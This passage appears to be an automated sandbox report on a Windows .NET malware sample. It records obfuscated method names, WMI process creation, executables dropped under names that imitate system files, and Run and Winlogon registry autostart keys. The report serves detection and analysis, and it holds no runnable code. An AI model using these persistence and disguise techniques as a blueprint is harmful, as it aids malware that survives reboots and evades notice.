                            Source: 4si9noTBNw.exe, sNS8OEaWkVg5r78UVE4.csHigh entropy of concatenated method names: 'N0fauVsXQj', 'I78aShYnI6', 'iwDaChDZsW', 'J3FaxHIdUW', 'Dispose', 'YtgGCZbEu0gGlvcDx8h3', 'qRaecMbES31XO5s1Uadb', 'i73NBpbECSYREQJxMPKQ', 'Vq9kcEbEx5DH8kNdjX7G', 'MupVa0bEsVcrGJNNePbd'
                            Source: 4si9noTBNw.exe, bLlsVg5U0b9kkMMYwf0.csHigh entropy of concatenated method names: 'dSD5OrUJLT', 'tUp52Ucnu8', 'aSS5fNTj8Q', 'yudvfrbViq1DZDstnDZw', 'EnDuMPbV11m9DALfSoaF', 'UFeNTkbVlXkCoQJvpZJR', 'rG9818bVXt99asAguC2r', 'xcywh5bVv3N59lTMgHXF'
                            Source: 4si9noTBNw.exe, Pc8anUdAnCpDbgdaux4.csHigh entropy of concatenated method names: 'R3AdLySl5F', 'jyboqjbW2XBC850y9Vf6', 'XZMtFibWfkgaRW1CEDOi', 'YqZridbWm2Uv5Rr996HJ', 'HFPS5nbWOLLvfOrJCGUG', 'BAatkJbW39yIUIdvwguE', 'fVqg6SbWHXrLvZ4ZKDfH', 'z3u69VbW7erJqNPLnVAp', 'FPXIKXU3Ff', 'WcT4TabW1nyI4iWUbSVy'
                            Source: 4si9noTBNw.exe, XfTEA56MAEn0pibsMs3.csHigh entropy of concatenated method names: 'P9X', 'Rc0bdvvHoVy', 'vmethod_0', 'imethod_0', 'uqdTG8buDDyOqsqdrfIS', 'WkoaNTbuB0B2CJe6rZHd', 'waoM3lbuWni9cYrUc7PE', 'Y2peAJbuuJoyenhD0jgJ', 'W9EJaIbuSsKyuHFi4WkU', 'pMhCv4buCk0jnsrDx8ZX'
                            Source: 4si9noTBNw.exe, xWFdtBKhISLiadldGS0.csHigh entropy of concatenated method names: 'dnBKWfA0Mh', 'jhdrMObDVDjE4klqmWrw', 'PqUsZDbDZHUL2VSNoLbE', 'z9ZPpHbDFZoRcNCYup3B', 'mwMYb5bDt1UGnec0hhUK', 'E94', 'P9X', 'vmethod_0', 'a77bdlNbLB5', 'KRVbUmrjJVx'
                            Source: 4si9noTBNw.exe, nYHJ2QmY2gKQjF75k8S.csHigh entropy of concatenated method names: 'ouGwC5bskxre0RhpNH0f', 'QF0hmIbsjTL2fWNN2l8h', 'd9a3qY4l8M', 'dOGxSqbsaYKNT2EOQhD3', 'TZeflabsrlf5r0Qi9CAF', 'sfFRgsbsgqiSQdce7OyQ', 'Stahc0bs0m7iBY9orVUb', 'vZEMKWbsEj6fteh4V6Qm', 'iCHHbHBvxl', 'tEpVvdbR4UBju4RwXU77'
                            Source: 4si9noTBNw.exe, igrYyI1r1tjnI4HpVoF.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'jnObUMxm20c', 'avMbdZIwUjD', 'Bgnk6gbc8oHRtp838dcM', 'ALA9TPbcGTGJQVqKvkCa', 'u6YeOGbcN5iuxbpSnqSb', 'zjSQgNbcT57txjpIN1yW', 'R71WHvbcZrEofYYHtOWt'
                            Source: 4si9noTBNw.exe, X6jkY6BT2lBlFy7kCW4.csHigh entropy of concatenated method names: 'HULBFSjL4V', 'btsBVQ7lDp', 'J0ABtUVDhY', 'OeyBkbu6vA', 'TtRBjJr5Yd', 'HQALHQbtLKRiX3vhdaLX', 'HrqQGabtq4YvDImfOA2v', 'YF3w61btzLrGC3Sd6aCL', 'XfbpHubt0Q9sSBuCDmvs', 'aKfAvabtEmTjuCUx9nbf'
                            Source: 4si9noTBNw.exe, VUgsBHISUExAOLUQhEe.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'LMwbd2pFLMe', 'h24Ixo8o1L', 'imethod_0', 'fEYxXmbWeYUN5BQVTekc', 'ds0wMBbWrnU1ZaQMwCPe', 'C0rUbobWgaYywEeWTr4c', 'VFS9JJbWaNqJ7PrKOREx'
                            Source: 4si9noTBNw.exe, M2vxprlRESRyCyyr6nM.csHigh entropy of concatenated method names: 'N2N', 'GsxbUHqRMjt', 'TMblclHFKy', 'XZSbU7Cvoc4', 'chWgiBb8DCJThPoU0eKE', 'y9Ilk6b8uwAl3gM4iOPU', 'akSHh7b8BdvTC5jbufao', 'ddas5Ub8Wom0AIlrKgba', 'stcslRb8SKH5NwRKS01B', 'IO4wh5b8CyygdF5CQ8K9'
                            Source: 4si9noTBNw.exe, Bpr2BUnlbPsn6tabHbe.csHigh entropy of concatenated method names: 'UPjnXWn6eO', 'FiXnvwagEi', 'Qm3CY4bpoYKqxDnnDGk6', 'hHYpp1bpQKrnfs3xSBpy', 'SiMym5bpwlG4kHZeNGkH', 'eN1fePbppOCDBHagSAHT', 'EgdSlBbp5NdmkU3sBKVn', 'PLxP0XbpB7n2Mil5qiBO', 'vQm28cbpWnVxmr6Yyhge', 'puvTtVbpDglEIMO5aAbd'
                            Source: 4si9noTBNw.exe, zVn3jelaEra36uJLPdf.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'iHWlEYOnXG', 'GjGbU9PVZEy', 'H7rhIAb8aEwXgHh2FwSd', 'r2uesBb8r4TIJg8gmJRp', 'tXsnhOb8gIF1AuNI5MFm', 'tVDOIob80lK9sonWr9rc', 'jGp6sEb8E5abYw96t5Qb'
                            Source: 4si9noTBNw.exe, a6rLn8i2je1HGHZjrwB.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'ok6bUXV7AUW', 'y82bUvGpOJ5', 'osrj78bGfL42REPeXjD1', 'iZnibjbGMB0X7a1ZDkfm', 'p5a24DbG3vuqtjlagoUd', 'Eal5XWbGHZaNyp2S4Dw3', 'Q6VFxObG7VaK30rtqsEU', 'qxgieUbGyVPm3Rs9Q04b'
                            Source: 4si9noTBNw.exe, HsIB8XbqSEpwb5HQVZT.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'PHrbUb8NgQp', 'b3Obdbm8D8P', 'XY8tHBboz0S8DNghsf7w', 'wCoJbrbp48mX0oqYlpdv', 's019IRbpbX7k6VIOntwK', 'ubCd6hbpnoDfOC0GE4hD'
                            Source: 4si9noTBNw.exe, hNmGcjnWuBwgG4TaA1J.csHigh entropy of concatenated method names: 'gPMn84vLUI', 'z57nGMZEPD', 'HLwWYebp8GXYvELDUjLR', 'cXSR6WbpASdXy3rQv698', 'MBli4XbpcCLJ0EirYyut', 'h56qUnbpG6ZMyu72To2E', 'VbinFFWl8f', 'VrhWNybpTDH59T5KDiPx', 'jvR2L2bpZjf6PZlmRq6Q', 'KY6qE1bpFA3j1qLdLMpj'
                            Source: 4si9noTBNw.exe, auDqZ504ahmB8YKhbCs.csHigh entropy of concatenated method names: 'Nns0d4qdJV', 'T5V0IQXf71', 'PRbqGNbLPAhtpv3esV5y', 'bwOWgLbLdf2lSxlvY0Vm', 'IVmMUebLb33xRGVvZluq', 'ab4OJ4bLnmR6MGtbWScb', 'fbXBDLbLIq9Z7vH07t91', 'wdNXIWbLKlqp4EPAnO29', 'kEB0nCdm4o', 'uZAAxtbELgDnPjdHiCmW'
                            Source: 4si9noTBNw.exe, EOkjgwaMgaPg453Paua.csHigh entropy of concatenated method names: 'iPsa7G6uTw', 'Lf2a11gc4k', 'c2maXrB7Ku', 'mYvavf6qNv', 'VaiaYAB9Em', 'pDEahaTuEO', 'IM9aQ96huP', 'wtiaw80H6x', 'Dispose', 'QAuie2bEoIF47hqDmcXy'
                            Source: 4si9noTBNw.exe, JeU0gcLAAXG4IMMUDjl.csHigh entropy of concatenated method names: 'pMFbKDrBggV', 'gLibKuaDXFa', 'eVtbKS1AHWT', 'svrbKCYVbLJ', 'yRebKxUvNbt', 'EGQbKsoWlik', 'sMpbKRF20Ka', 'q2DqIsN4ss', 'T6XbKAO9pQu', 'wmTbKcSTJp7'
                            Source: 4si9noTBNw.exe, R3SxwQRWpBQ8UJpuGvO.csHigh entropy of concatenated method names: 'dqkRue3OWe', 'nwbRSnRtaj', 'H1TRCx58BI', 'LXHRxbMA92', 'PbkRsfIbB4', 'n0qRRAONde', 'aZJRASC3No', 'M53RcCcODN', 'GhwR8fQvQb', 'SrFRGqBrkG'
                            Source: 4si9noTBNw.exe, DZTwLupqmEQneagKYE0.csHigh entropy of concatenated method names: 'SMj54Ex8W5', 'SvC5bDWhPB', 'nTv5nbPbya', 'NFc5PNb1Xo', 'FQm5dcYOsu', 'eIT5IRuUZY', 'g6UZxDbVMTFkZEfk2YpQ', 'eST7isbV2Y89SJNPMFd7', 'HFanchbVf3bCTUrLByHf', 'Pt4bJxbV3VVYdkLYauqY'
                            Source: 4si9noTBNw.exe, KULE0rAWN9ZujanSfHO.csHigh entropy of concatenated method names: 'Q1nAueH0BB', 'hrLASB7BV6', 'OlBACscp1W', 'TRgAxdSO70', 'gEjAsiYH8D', 'JYAARBOpZ6', 'vSsAApFXHX', 'otMActFAS5', 'c2WA8XaSX9', 'bl6AGSNgS5'
                            Source: 4si9noTBNw.exe, rcZ3xnoP8aNA0dMsIPS.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 't0ToI6ib9M', 'Write', 'd6ZoKKx7KO', 'HTno6IsDdD', 'Flush', 'vl7'
                            Source: 4si9noTBNw.exe, wpuioCbrL3yE90PkSdk.csHigh entropy of concatenated method names: 'P9X', 'nlabaeJTFf', 'PRwbU407uxA', 'imethod_0', 'o01b0IKNQx', 'tBJkIvboghjjv1jXn2c6', 'BoW0tgboaolAVexGZZik', 'gSpTSdboeYyYOYCaycMD', 'NUVjkUborcPB6gbMBZJ2', 'd1OD5Cbo0BDUKlULISsB'
                            Source: 4si9noTBNw.exe, AWiGJVPkeR19qtmQDPE.csHigh entropy of concatenated method names: 'eDBdPGvwwQ', 'pEFdd0J6rk', 'uUEdIJYt6T', 'gJDa58bBfP3xjKP4anS7', 'wvgoqRbBOpI1LXmP1JOQ', 'AgHvksbB2TM4yrkYhT7t', 'aYDd2hRnGZ', 'gCxrJEbB7m8UeibCXaib', 'jZ3JJIbB37FYffYKRlv6', 'nlEC8DbBHXOFu01gxkQM'
                            Source: 4si9noTBNw.exe, uNgXnZA01cfOCuKYw2N.csHigh entropy of concatenated method names: 'e64ALun2KV', 'GopAqlkiJl', 'qZsAzPfr0O', 'vgFc4UmfEZ', 'ERKcbdCRIg', 'l26cnWANt4', 'xJKcP3Iurw', 'TNkcdPIR61', 'iZVcIYZIHh', 'ffmcK7JYZm'
                            Source: 4si9noTBNw.exe, x8GyWym3dXFv5kVJ1ls.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'PgXfNrbCcniCw0CuURJ6', 'Qd5DHmbC86wm9eanGyf1', 'M2tfuCbCGPbCJbcwRiUd', 'f8QrLFbCNKM0HC9SjuvM'
                            Source: 4si9noTBNw.exe, IXip9H6WwHkM7v08KL3.csHigh entropy of concatenated method names: 'SGV6u0Gcfs', 'm8g6SIyCRr', 'OkxKu7buLx51QkkwALAM', 'MpK4YWbu0CDIhjNMt8m0', 'yD5edVbuE9cdJxslqvBl', 'DbSykPbuqcLcq0iK8r4I', 's1rf6qbuzWVrFjJEnY0t', 'Nu6Yq2bS4fSQUTFpov5v', 'KCpvYqbSbs0KQqUH964f', 'KcOMyYbSnyx7QKBnLGW3'

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Recovery\VTixufCejPQZEvXiB.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\xWYkXXxo.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Program Files\Windows Defender\en-GB\conhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\Public\AccountPictures\winlogon.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\hEXMkWTV.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\OuwhFfWF.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\exZDPEZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\JzShoUtR.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\hMjNZkhU.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\YdQxpHbm.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\nocldQFM.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\nocldQFM.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\exZDPEZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\JzShoUtR.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\hEXMkWTV.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\xWYkXXxo.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\hMjNZkhU.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\YdQxpHbm.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\OuwhFfWF.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNwJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNwJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNwJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNwJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4si9noTBNwJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VTixufCejPQZEvXiBJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
